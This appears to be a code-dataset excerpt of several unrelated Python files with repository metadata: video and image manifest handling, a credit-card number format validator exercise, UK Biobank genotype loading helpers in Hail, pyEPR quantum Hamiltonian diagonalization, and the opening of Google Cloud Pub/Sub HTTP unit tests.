setattr(self._manifest, 'TYPE', 'video')
self.BASE_INFORMATION['properties'] = 3
def create(self, content, **kwargs):
""" Creating and saving a manifest file """
with open(self._manifest.path, 'w') as manifest_file:
base_info = {
'version': self._manifest.VERSION,
'type': self._manifest.TYPE,
'properties': {
'name': os.path.basename(content.source_path),
'resolution': content.frame_sizes,
'length': content.get_size(),
},
}
for key, value in base_info.items():
json_item = json.dumps({key: value}, separators=(',', ':'))
manifest_file.write(f'{json_item}\n')
for item in content:
json_item = json.dumps({
'number': item[0],
'pts': item[1],
'checksum': item[2]
}, separators=(',', ':'))
manifest_file.write(f"{json_item}\n")
def partial_update(self, number, properties):
pass
@staticmethod
def prepare_meta(media_file, upload_dir=None, chunk_size=36, force=False):
source_path = os.path.join(upload_dir, media_file) if upload_dir else media_file
meta_info = VideoStreamReader(source_path=source_path)
meta_info.check_type_first_frame()
try:
meta_info.validate_frames_ratio(chunk_size)
except AssertionError:
if not force:
raise
meta_info.check_video_timestamps_sequences()
meta_info.save_key_frames()
meta_info.validate_seek_key_frames()
return meta_info
@property
def video_name(self):
return self['properties']['name']
@property
def video_resolution(self):
return self['properties']['resolution']
@property
def video_length(self):
return self['properties']['length']
@property
def data(self):
return (self.video_name)
def get_subset(self, subset_names):
raise NotImplementedError()
#TODO: add generic manifest structure file validation
class ManifestValidator:
def validate_base_info(self):
with open(self._manifest.path, 'r') as manifest_file:
assert self._manifest.VERSION != json.loads(manifest_file.readline())['version']
assert self._manifest.TYPE != json.loads(manifest_file.readline())['type']
class VideoManifestValidator(VideoManifestManager):
def __init__(self, source_path, manifest_path):
self.source_path = source_path
super().__init__(manifest_path)
@staticmethod
def _get_video_stream(container):
video_stream = next(stream for stream in container.streams if stream.type == 'video')
video_stream.thread_type = 'AUTO'
return video_stream
def validate_key_frame(self, container, video_stream, key_frame):
for packet in container.demux(video_stream):
for frame in packet.decode():
assert frame.pts == key_frame['pts'], "The uploaded manifest does not match the video"
return
def validate_seek_key_frames(self):
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
last_key_frame = None
for _, key_frame in self:
# check that key frames sequence sorted
if last_key_frame and last_key_frame['number'] >= key_frame['number']:
raise AssertionError('Invalid saved key frames sequence in manifest file')
container.seek(offset=key_frame['pts'], stream=video_stream)
self.validate_key_frame(container, video_stream, key_frame)
last_key_frame = key_frame
def validate_frame_numbers(self):
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
# not all videos contain information about numbers of frames
frames = video_stream.frames
if frames:
assert frames == self.video_length, "The uploaded manifest does not match the video"
return
class ImageManifestManager(_ManifestManager):
_requared_item_attributes = {'name', 'extension'}
def __init__(self, manifest_path, upload_dir=None):
super().__init__(manifest_path, upload_dir)
setattr(self._manifest, 'TYPE', 'images')
def create(self, content, **kwargs):
""" Creating and saving a manifest file"""
with open(self._manifest.path, 'w') as manifest_file:
base_info = {
'version': self._manifest.VERSION,
'type': self._manifest.TYPE,
}
for key, value in base_info.items():
json_item = json.dumps({key: value}, separators=(',', ':'))
manifest_file.write(f'{json_item}\n')
for item in content:
json_item = json.dumps({
key: value for key, value in item.items()
}, separators=(',', ':'))
manifest_file.write(f"{json_item}\n")
def partial_update(self, number, properties):
pass
@staticmethod
def prepare_meta(sources, **kwargs):
meta_info = DatasetImagesReader(sources=sources, **kwargs)
meta_info.create()
return meta_info
@property
def data(self):
return (f"{image['name']}{image['extension']}" for _, image in self)
def get_subset(self, subset_names):
return ({
'name': f"{image['name']}",
'extension': f"{image['extension']}",
'width': image['width'],
'height': image['height'],
'meta': image['meta'],
'checksum': f"{image['checksum']}"
} for _, image in self if f"{image['name']}{image['extension']}" in subset_names)
| 36.4
| 118
| 0.591273
|
794fdfe34467fd8272a26ebd5b4c6566bf325719
| 268
|
py
|
Python
|
medium/13_validate_credit_card_nums.py
|
UltiRequiem/hacker-rank-python
|
bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1
|
[
"MIT"
] | 4
|
2021-08-02T21:34:38.000Z
|
2021-09-24T03:26:33.000Z
|
medium/13_validate_credit_card_nums.py
|
UltiRequiem/hacker-rank-python
|
bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1
|
[
"MIT"
] | null | null | null |
medium/13_validate_credit_card_nums.py
|
UltiRequiem/hacker-rank-python
|
bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1
|
[
"MIT"
] | 3
|
2021-08-02T21:34:39.000Z
|
2021-08-02T21:37:16.000Z
|
from re import compile
def run(DATA):
for _ in range(int(input().strip())):
print("Valid" if DATA.search(input().strip()) else "Invalid")
if __name__ == "__main__":
run(compile(r"^" r"(?!.*(\d)(-?\1){3})" r"[456]" r"\d{3}" r"(?:-?\d{4}){3}" r"$"))
| 24.363636
| 86
| 0.526119
|
794fe06b2f1e44b4fc0a7ec067a3c1433ab4528c
| 3,434
|
py
|
Python
|
resources/genotypes.py
|
rahulg603/ukbb_pan_ancestry
|
482f23f0ae7ea14a92540f218aa7b0750e207605
|
[
"MIT"
] | null | null | null |
resources/genotypes.py
|
rahulg603/ukbb_pan_ancestry
|
482f23f0ae7ea14a92540f218aa7b0750e207605
|
[
"MIT"
] | null | null | null |
resources/genotypes.py
|
rahulg603/ukbb_pan_ancestry
|
482f23f0ae7ea14a92540f218aa7b0750e207605
|
[
"MIT"
] | null | null | null |
import hail as hl
from .generic import *
ukb_imputed_bgen_path = 'gs://fc-7d5088b4-7673-45b5-95c2-17ae00a04183/imputed/ukb_imp_chr{}_v3.bgen'
ukb_imputed_info_path = 'gs://fc-7d5088b4-7673-45b5-95c2-17ae00a04183/imputed/ukb_mfi_chr{}_v3.txt'
ukb_imputed_info_ht_path = f'{bucket}/imputed/ukb_mfi_v3.ht'
def get_sample_file(chromosome: str = '1'):
if chromosome not in ('X', 'XY'):
chromosome = 'autosomes'
elif not chromosome.startswith('chr'):
chromosome = f'chr{chromosome}'
return f'gs://ukb31063/ukb31063.{chromosome}.sample'
def get_ukb_imputed_data(chromosome: str = '1', variant_list: hl.Table = None, entry_fields = ('GP', )):
if chromosome == 'all':
chromosome = '{' + ','.join(map(str, range(1, 23))) + '}'
add_args = {}
if variant_list is not None:
add_args['variants'] = variant_list
return hl.import_bgen(ukb_imputed_bgen_path.format(chromosome), entry_fields=entry_fields,
sample_file=get_sample_file(chromosome), **add_args)
def get_filtered_mt(chrom: str = 'all',
pop: str = 'all',
imputed: bool = True,
min_mac: int = 20,
entry_fields=('GP',),
filter_mac_instead_of_ac: bool = False):
# get ac or mac based on filter_mac_instead_of_ac
def get_ac(af, an):
if filter_mac_instead_of_ac:
# Note that the underlying file behind get_ukb_af_ht_path() accidentally double af and halve an
return (1.0 - hl.abs(1.0 - af)) * an
else:
return af * an
if imputed:
ht = hl.read_table(get_ukb_af_ht_path())
if pop == 'all':
ht = ht.filter(hl.any(lambda x: get_ac(ht.af[x], ht.an[x]) >= min_mac, hl.literal(POPS)))
else:
ht = ht.filter(get_ac(ht.af[pop], ht.an[pop]) >= min_mac)
mt = get_ukb_imputed_data(chrom, variant_list=ht, entry_fields=entry_fields)
else:
mt = hl.read_matrix_table('gs://ukb31063/ukb31063.genotype.mt')
covariates_ht = get_covariates()
hq_samples_ht = get_hq_samples()
mt = mt.annotate_cols(**covariates_ht[mt.s])
mt = mt.filter_cols(hl.is_defined(mt.pop) & hl.is_defined(hq_samples_ht[mt.s]))
if pop != 'all': mt = mt.filter_cols(mt.pop == pop)
return mt
def get_ukb_af_ht_path(with_x = True, repart=False):
return f'{bucket}/imputed/ukb_frequencies{"_with_x" if with_x else ""}{".repart" if repart else ""}.ht'
def get_ukb_vep_path():
return f'{bucket}/results/misc/ukb.vep.ht'
def get_ukb_grm_mt_path(pop: str, data_iteration: int = 0):
suffix = f'.{data_iteration}' if data_iteration else ""
return f'{bucket}/results/misc/ukb.{pop}.for_grm{suffix}.mt'
def get_ukb_grm_pruned_ht_path(pop: str, window_size: str = '1e6'):
cut = '' if window_size == '1e6' else f'.{window_size}'
return f'{bucket}/results/misc/ukb.{pop}.for_grm.pruned{cut}.ht'
def get_ukb_grm_plink_path(pop: str, data_iteration: int = 0, window_size: str = '1e6'):
suffix = f'.{data_iteration}' if data_iteration else ""
cut = '' if window_size == '1e6' else f'.{window_size}'
return f'{bucket}/results/misc/ukb.{pop}.for_grm{suffix}.pruned{cut}.plink'
def get_ukb_samples_file_path(pop: str, data_iteration: int = 0):
suffix = f'.{data_iteration}' if data_iteration else ""
return f'{bucket}/results/misc/ukb.{pop}{suffix}.samples'
| 39.471264
| 107
| 0.650844
|
794fe08c919b830bfb4dda4da5bc1421b03d15e5
| 12,844
|
py
|
Python
|
pyEPR/calcs/back_box_numeric.py
|
mkxia57/pyEPR
|
fab8c9434888982dcf4a8cec1d348200dbb02d11
|
[
"BSD-3-Clause"
] | 109
|
2017-09-19T18:53:45.000Z
|
2022-03-07T17:39:09.000Z
|
pyEPR/calcs/back_box_numeric.py
|
mkxia57/pyEPR
|
fab8c9434888982dcf4a8cec1d348200dbb02d11
|
[
"BSD-3-Clause"
] | 78
|
2017-09-21T16:08:55.000Z
|
2022-03-31T12:42:52.000Z
|
pyEPR/calcs/back_box_numeric.py
|
mkxia57/pyEPR
|
fab8c9434888982dcf4a8cec1d348200dbb02d11
|
[
"BSD-3-Clause"
] | 139
|
2017-09-18T19:01:20.000Z
|
2022-03-22T21:07:59.000Z
|
'''
Numerical diagonalization of quantum Hamiltonian and parameter
extraction.
@author: Phil Reinhold, Zlatko Minev, Lysander Christakis
Original code on black_box_hamiltonian and make_dispersive functions by Phil Reinhold
Revisions and updates by Zlatko Minev & Lysander Christakis
'''
# pylint: disable=invalid-name
from __future__ import print_function
from functools import reduce
import numpy as np
from .constants import Planck as h
from .constants import fluxQ, hbar
from .hamiltonian import MatrixOps
try:
import qutip
from qutip import basis, tensor
except (ImportError, ModuleNotFoundError):
pass
__all__ = [ 'epr_numerical_diagonalization',
'make_dispersive',
'black_box_hamiltonian',
'black_box_hamiltonian_nq']
dot = MatrixOps.dot
cos_approx = MatrixOps.cos_approx
# ==============================================================================
# ANALYSIS FUNCTIONS
# ==============================================================================
def epr_numerical_diagonalization(freqs, Ljs, ϕzpf,
cos_trunc=8,
fock_trunc=9,
use_1st_order=False,
return_H=False):
'''
Numerical diagonalizaiton for pyEPR. Ask Zlatko for details.
:param fs: (GHz, not radians) Linearized model, H_lin, normal mode frequencies in Hz, length M
:param ljs: (Henries) junction linerized inductances in Henries, length J
:param fzpfs: (reduced) Reduced Zero-point fluctutation of the junction fluxes for each mode
across each junction, shape MxJ
:return: Hamiltonian mode freq and dispersive shifts. Shifts are in MHz.
Shifts have flipped sign so that down shift is positive.
'''
freqs, Ljs, ϕzpf = map(np.array, (freqs, Ljs, ϕzpf))
assert(all(freqs < 1E6)
), "Please input the frequencies in GHz. \N{nauseated face}"
assert(all(Ljs < 1E-3)
), "Please input the inductances in Henries. \N{nauseated face}"
Hs = black_box_hamiltonian(freqs * 1E9, Ljs.astype(np.float), fluxQ*ϕzpf,
cos_trunc, fock_trunc, individual=use_1st_order)
f_ND, χ_ND, _, _ = make_dispersive(
Hs, fock_trunc, ϕzpf, freqs, use_1st_order=use_1st_order)
χ_ND = -1*χ_ND * 1E-6 # convert to MHz, and flip sign so that down shift is positive
return (f_ND, χ_ND, Hs) if return_H else (f_ND, χ_ND)
def black_box_hamiltonian(fs, ljs, fzpfs, cos_trunc=5, fock_trunc=8, individual=False):
r"""
:param fs: Linearized model, H_lin, normal mode frequencies in Hz, length N
:param ljs: junction linerized inductances in Henries, length M
:param fzpfs: Zero-point fluctutation of the junction fluxes for each mode across each junction,
shape MxJ
:return: Hamiltonian in units of Hz (i.e H / h)
All in SI units. The ZPF fed in are the generalized, not reduced, flux.
Description:
Takes the linear mode frequencies, $\omega_m$, and the zero-point fluctuations, ZPFs, and
builds the Hamiltonian matrix of $H_full$, assuming cos potential.
"""
n_modes = len(fs)
njuncs = len(ljs)
fs, ljs, fzpfs = map(np.array, (fs, ljs, fzpfs))
ejs = fluxQ**2 / ljs
fjs = ejs / h
fzpfs = np.transpose(fzpfs) # Take from MxJ to JxM
assert np.isnan(fzpfs).any(
) == False, "Phi ZPF has NAN, this is NOT allowed! Fix me. \n%s" % fzpfs
assert np.isnan(ljs).any(
) == False, "Ljs has NAN, this is NOT allowed! Fix me."
assert np.isnan(
fs).any() == False, "freqs has NAN, this is NOT allowed! Fix me."
assert fzpfs.shape == (njuncs, n_modes), "incorrect shape for zpf array, {} not {}".format(
fzpfs.shape, (njuncs, n_modes))
assert fs.shape == (n_modes,), "incorrect number of mode frequencies"
assert ejs.shape == (njuncs,), "incorrect number of qubit frequencies"
def tensor_out(op, loc):
"Make operator <op> tensored with identities at locations other than <loc>"
op_list = [qutip.qeye(fock_trunc) for i in range(n_modes)]
op_list[loc] = op
return reduce(qutip.tensor, op_list)
a = qutip.destroy(fock_trunc)
ad = a.dag()
n = qutip.num(fock_trunc)
mode_fields = [tensor_out(a + ad, i) for i in range(n_modes)]
mode_ns = [tensor_out(n, i) for i in range(n_modes)]
def cos(x):
return cos_approx(x, cos_trunc=cos_trunc)
linear_part = dot(fs, mode_ns)
cos_interiors = [dot(fzpf_row/fluxQ, mode_fields) for fzpf_row in fzpfs]
nonlinear_part = dot(-fjs, map(cos, cos_interiors))
if individual:
return linear_part, nonlinear_part
else:
return linear_part + nonlinear_part
bbq_hmt = black_box_hamiltonian
def make_dispersive(H, fock_trunc, fzpfs=None, f0s=None, chi_prime=False,
use_1st_order=False):
r"""
Input: Hamiltonian Matrix.
Optional: phi_zpfs and normal mode frequncies, f0s.
use_1st_order : deprecated
Output:
Return dressed mode frequencies, chis, chi prime, phi_zpf flux (not reduced), and linear frequencies
Description:
Takes the Hamiltonian matrix `H` from bbq_hmt. It them finds the eigenvalues/eigenvectors and assigns quantum numbers to them --- i.e., mode excitations, such as, for instance, for three mode, |0,0,0> or |0,0,1>, which correspond to no excitations in any of the modes or one excitation in the 3rd mode, resp. The assignment is performed based on the maximum overlap between the eigenvectors of H_full and H_lin. If this crude explanation is confusing, let me know, I will write a more detailed one :slightly_smiling_face:
Based on the assignment of the excitations, the function returns the dressed mode frequencies $\omega_m^\prime$, and the cross-Kerr matrix (including anharmonicities) extracted from the numerical diagonalization, as well as from 1st order perturbation theory.
Note, the diagonal of the CHI matrix is directly the anharmonicity term.
"""
if hasattr(H, '__len__'): # is it an array / list?
[H_lin, H_nl] = H
H = H_lin + H_nl
else: # make sure its a quanutm object
assert type(
H) == qutip.qobj.Qobj, "Please pass in either a list of Qobjs or Qobj for the Hamiltonian"
print("Starting the diagonalization")
evals, evecs = H.eigenstates()
print("Finished the diagonalization")
evals -= evals[0]
N = int(np.log(H.shape[0]) / np.log(fock_trunc)) # number of modes
assert H.shape[0] == fock_trunc ** N
def fock_state_on(d):
''' d={mode number: # of photons} '''
return qutip.tensor(*[qutip.basis(fock_trunc, d.get(i, 0)) for i in range(N)]) # give me the value d[i] or 0 if d[i] does not exist
if use_1st_order:
num_modes = N
print("Using 1st O")
def multi_index_2_vector(d, num_modes, fock_trunc):
return tensor([basis(fock_trunc, d.get(i, 0)) for i in range(num_modes)])
'''this function creates a vector representation a given fock state given the data for excitations per
mode of the form d={mode number: # of photons}'''
def find_multi_indices(fock_trunc):
multi_indices = [{ind: item for ind, item in enumerate([i, j, k])} for i in range(fock_trunc)
for j in range(fock_trunc)
for k in range(fock_trunc)]
return multi_indices
'''this function generates all possible multi-indices for three modes for a given fock_trunc'''
def get_expect_number(left, middle, right):
return (left.dag()*middle*right).data.toarray()[0, 0]
'''this function calculates the expectation value of an operator called "middle" '''
def get_basis0(fock_trunc, num_modes):
multi_indices = find_multi_indices(fock_trunc)
basis0 = [multi_index_2_vector(
multi_indices[i], num_modes, fock_trunc) for i in range(len(multi_indices))]
evalues0 = [get_expect_number(v0, H_lin, v0).real for v0 in basis0]
return multi_indices, basis0, evalues0
'''this function creates a basis of fock states and their corresponding eigenvalues'''
def closest_state_to(vector0):
def PT_on_vector(original_vector, original_basis, pertub, energy0, evalue):
new_vector = 0 * original_vector
for i in range(len(original_basis)):
if (energy0[i]-evalue) > 1e-3:
new_vector += ((original_basis[i].dag()*H_nl*original_vector).data.toarray()[
0, 0])*original_basis[i]/(evalue-energy0[i])
else:
pass
return (new_vector + original_vector)/(new_vector + original_vector).norm()
'''this function calculates the normalized vector with the first order correction term
from the non-linear hamiltonian '''
[multi_indices, basis0, evalues0] = get_basis0(
fock_trunc, num_modes)
evalue0 = get_expect_number(vector0, H_lin, vector0)
vector1 = PT_on_vector(vector0, basis0, H_nl, evalues0, evalue0)
index = np.argmax([(vector1.dag() * evec).norm()
for evec in evecs])
return evals[index], evecs[index]
else:
def closest_state_to(s):
def distance(s2):
return (s.dag() * s2[1]).norm()
return max(zip(evals, evecs), key=distance)
f1s = [closest_state_to(fock_state_on({i: 1}))[0] for i in range(N)]
chis = [[0]*N for _ in range(N)]
chips = [[0]*N for _ in range(N)]
for i in range(N):
for j in range(i, N):
d = {k: 0 for k in range(N)} # put 0 photons in each mode (k)
d[i] += 1
d[j] += 1
# load ith mode and jth mode with 1 photon
fs = fock_state_on(d)
ev, evec = closest_state_to(fs)
chi = (ev - (f1s[i] + f1s[j]))
chis[i][j] = chi
chis[j][i] = chi
if chi_prime:
d[j] += 1
fs = fock_state_on(d)
ev, evec = closest_state_to(fs)
chip = (ev - (f1s[i] + 2*f1s[j]) - 2 * chis[i][j])
chips[i][j] = chip
chips[j][i] = chip
if chi_prime:
return np.array(f1s), np.array(chis), np.array(chips), np.array(fzpfs), np.array(f0s)
else:
return np.array(f1s), np.array(chis), np.array(fzpfs), np.array(f0s)
def black_box_hamiltonian_nq(freqs, zmat, ljs, cos_trunc=6, fock_trunc=8, show_fit=False):
"""
N-Qubit version of bbq, based on the full Z-matrix
Currently reproduces 1-qubit data, untested on n-qubit data
Assume: Solve the model without loss in HFSS.
"""
nf = len(freqs)
nj = len(ljs)
assert zmat.shape == (nf, nj, nj)
imY = (1/zmat[:, 0, 0]).imag
# zeros where the sign changes from negative to positive
(zeros,) = np.where((imY[:-1] <= 0) & (imY[1:] > 0))
nz = len(zeros)
imYs = np.array([1 / zmat[:, i, i] for i in range(nj)]).imag
f0s = np.zeros(nz)
slopes = np.zeros((nj, nz))
import matplotlib.pyplot as plt
# Fit a second order polynomial in the region around the zero
# Extract the exact location of the zero and the assocated slope
# If you need better than second order fit, you're not sampling finely enough
for i, z in enumerate(zeros):
f0_guess = (freqs[z+1] + freqs[z]) / 2
zero_polys = np.polyfit(
freqs[z-1:z+3] - f0_guess, imYs[:, z-1:z+3].transpose(), 2)
zero_polys = zero_polys.transpose()
f0s[i] = f0 = min(np.roots(zero_polys[0]),
key=lambda r: abs(r)) + f0_guess
for j, p in enumerate(zero_polys):
slopes[j, i] = np.polyval(np.polyder(p), f0 - f0_guess)
if show_fit:
plt.plot(freqs[z-1:z+3] - f0_guess, imYs[:, z-1:z +
3].transpose(), lw=1, ls='--', marker='o', label=str(f0))
p = np.poly1d(zero_polys[0, :])
p2 = np.poly1d(zero_polys[1, :])
plt.plot(freqs[z-1:z+3] - f0_guess, p(freqs[z-1:z+3] - f0_guess))
plt.plot(freqs[z-1:z+3] - f0_guess, p2(freqs[z-1:z+3] - f0_guess))
plt.legend(loc=0)
zeffs = 2 / (slopes * f0s[np.newaxis, :])
# Take signs with respect to first port
zsigns = np.sign(zmat[zeros, 0, :])
fzpfs = zsigns.transpose() * np.sqrt(hbar * abs(zeffs) / 2)
H = black_box_hamiltonian(f0s, ljs, fzpfs, cos_trunc, fock_trunc)
return make_dispersive(H, fock_trunc, fzpfs, f0s)
black_box_hamiltonian_nq = black_box_hamiltonian_nq
| 42.813333
| 536
| 0.616007
|
794fe093bbb31b83d8b9e55012c0df569dfdd145
| 43,417
|
py
|
Python
|
pubsub/tests/unit/test__http.py
|
rodrigodias27/google-cloud-python
|
7d1161f70744c0dbbe67a3f472ea95667eaafe50
|
[
"Apache-2.0"
] | null | null | null |
pubsub/tests/unit/test__http.py
|
rodrigodias27/google-cloud-python
|
7d1161f70744c0dbbe67a3f472ea95667eaafe50
|
[
"Apache-2.0"
] | null | null | null |
pubsub/tests/unit/test__http.py
|
rodrigodias27/google-cloud-python
|
7d1161f70744c0dbbe67a3f472ea95667eaafe50
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
def _make_credentials():
import google.auth.credentials
return mock.Mock(spec=google.auth.credentials.Credentials)
class _Base(unittest.TestCase):
PROJECT = 'PROJECT'
LIST_TOPICS_PATH = 'projects/%s/topics' % (PROJECT,)
LIST_SNAPSHOTS_PATH = 'projects/%s/snapshots' % (PROJECT,)
LIST_SUBSCRIPTIONS_PATH = 'projects/%s/subscriptions' % (PROJECT,)
TOPIC_NAME = 'topic_name'
TOPIC_PATH = 'projects/%s/topics/%s' % (PROJECT, TOPIC_NAME)
LIST_TOPIC_SUBSCRIPTIONS_PATH = '%s/subscriptions' % (TOPIC_PATH,)
SNAPSHOT_NAME = 'snapshot_name'
SNAPSHOT_PATH = 'projects/%s/snapshots/%s' % (PROJECT, SNAPSHOT_NAME)
SUB_NAME = 'subscription_name'
SUB_PATH = 'projects/%s/subscriptions/%s' % (PROJECT, SUB_NAME)
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
class TestConnection(_Base):
@staticmethod
def _get_target_class():
from google.cloud.pubsub._http import Connection
return Connection
def test_default_url(self):
conn = self._make_one(object())
klass = self._get_target_class()
self.assertEqual(conn.api_base_url, klass.API_BASE_URL)
def test_custom_url_from_env(self):
from google.cloud.environment_vars import PUBSUB_EMULATOR
HOST = 'localhost:8187'
fake_environ = {PUBSUB_EMULATOR: HOST}
with mock.patch('os.environ', new=fake_environ):
conn = self._make_one(object())
klass = self._get_target_class()
self.assertNotEqual(conn.api_base_url, klass.API_BASE_URL)
self.assertEqual(conn.api_base_url, 'http://' + HOST)
def test_build_api_url_no_extra_query_params(self):
conn = self._make_one(object())
URI = '/'.join([
conn.API_BASE_URL,
conn.API_VERSION,
'foo',
])
self.assertEqual(conn.build_api_url('/foo'), URI)
def test_build_api_url_w_extra_query_params(self):
from six.moves.urllib.parse import parse_qsl
from six.moves.urllib.parse import urlsplit
conn = self._make_one(object())
uri = conn.build_api_url('/foo', {'bar': 'baz'})
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual('%s://%s' % (scheme, netloc), conn.API_BASE_URL)
self.assertEqual(path,
'/'.join(['', conn.API_VERSION, 'foo']))
parms = dict(parse_qsl(qs))
self.assertEqual(parms['bar'], 'baz')
def test_build_api_url_w_base_url_override(self):
base_url1 = 'api-base-url1'
base_url2 = 'api-base-url2'
conn = self._make_one(object())
conn.api_base_url = base_url1
URI = '/'.join([
base_url2,
conn.API_VERSION,
'foo',
])
self.assertEqual(conn.build_api_url('/foo', api_base_url=base_url2),
URI)
def test_extra_headers(self):
import requests
from google.cloud import _http as base_http
from google.cloud.pubsub import _http as MUT
http = mock.create_autospec(requests.Session, instance=True)
response = requests.Response()
response.status_code = 200
data = b'brent-spiner'
response._content = data
http.request.return_value = response
client = mock.Mock(_http=http, spec=['_http'])
conn = self._make_one(client)
req_data = 'req-data-boring'
result = conn.api_request(
'GET', '/rainbow', data=req_data, expect_json=False)
self.assertEqual(result, data)
expected_headers = {
'Accept-Encoding': 'gzip',
base_http.CLIENT_INFO_HEADER: MUT._CLIENT_INFO,
'User-Agent': conn.USER_AGENT,
}
expected_uri = conn.build_api_url('/rainbow')
http.request.assert_called_once_with(
data=req_data,
headers=expected_headers,
method='GET',
url=expected_uri,
)
class Test_PublisherAPI(_Base):
@staticmethod
def _get_target_class():
from google.cloud.pubsub._http import _PublisherAPI
return _PublisherAPI
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_ctor(self):
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
self.assertIs(api._client, client)
self.assertEqual(api.api_request, connection.api_request)
def test_list_topics_no_paging(self):
from google.cloud.pubsub.topic import Topic
returned = {'topics': [{'name': self.TOPIC_PATH}]}
connection = _Connection(returned)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
iterator = api.list_topics(self.PROJECT)
topics = list(iterator)
next_token = iterator.next_page_token
self.assertEqual(len(topics), 1)
topic = topics[0]
self.assertIsInstance(topic, Topic)
self.assertEqual(topic.name, self.TOPIC_NAME)
self.assertEqual(topic.full_name, self.TOPIC_PATH)
self.assertIsNone(next_token)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPICS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_list_topics_with_paging(self):
import six
from google.cloud.pubsub.topic import Topic
TOKEN1 = 'TOKEN1'
TOKEN2 = 'TOKEN2'
SIZE = 1
RETURNED = {
'topics': [{'name': self.TOPIC_PATH}],
'nextPageToken': 'TOKEN2',
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
iterator = api.list_topics(
self.PROJECT, page_token=TOKEN1, page_size=SIZE)
page = six.next(iterator.pages)
topics = list(page)
next_token = iterator.next_page_token
self.assertEqual(len(topics), 1)
topic = topics[0]
self.assertIsInstance(topic, Topic)
self.assertEqual(topic.name, self.TOPIC_NAME)
self.assertEqual(topic.full_name, self.TOPIC_PATH)
self.assertEqual(next_token, TOKEN2)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPICS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'],
{'pageToken': TOKEN1, 'pageSize': SIZE})
def test_list_topics_missing_key(self):
returned = {}
connection = _Connection(returned)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
iterator = api.list_topics(self.PROJECT)
topics = list(iterator)
next_token = iterator.next_page_token
self.assertEqual(len(topics), 0)
self.assertIsNone(next_token)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPICS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_topic_create(self):
RETURNED = {'name': self.TOPIC_PATH}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.topic_create(self.TOPIC_PATH)
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_topic_create_already_exists(self):
from google.cloud.exceptions import Conflict
connection = _Connection()
connection._no_response_error = Conflict
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
with self.assertRaises(Conflict):
api.topic_create(self.TOPIC_PATH)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_topic_get_hit(self):
RETURNED = {'name': self.TOPIC_PATH}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.topic_get(self.TOPIC_PATH)
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_topic_get_miss(self):
from google.cloud.exceptions import NotFound
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
with self.assertRaises(NotFound):
api.topic_get(self.TOPIC_PATH)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_topic_delete_hit(self):
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.topic_delete(self.TOPIC_PATH)
self.assertEqual(connection._called_with['method'], 'DELETE')
path = '/%s' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_topic_delete_miss(self):
from google.cloud.exceptions import NotFound
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
with self.assertRaises(NotFound):
api.topic_delete(self.TOPIC_PATH)
self.assertEqual(connection._called_with['method'], 'DELETE')
path = '/%s' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_topic_publish_hit(self):
import base64
PAYLOAD = b'This is the message text'
B64_PAYLOAD = base64.b64encode(PAYLOAD).decode('ascii')
MSGID = 'DEADBEEF'
MESSAGE = {'data': PAYLOAD, 'attributes': {}}
B64MSG = {'data': B64_PAYLOAD, 'attributes': {}}
RETURNED = {'messageIds': [MSGID]}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.topic_publish(self.TOPIC_PATH, [MESSAGE])
self.assertEqual(resource, [MSGID])
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:publish' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'],
{'messages': [B64MSG]})
msg_data = connection._called_with['data']['messages'][0]['data']
self.assertEqual(msg_data, B64_PAYLOAD)
def test_topic_publish_twice(self):
import base64
PAYLOAD = b'This is the message text'
B64_PAYLOAD = base64.b64encode(PAYLOAD).decode('ascii')
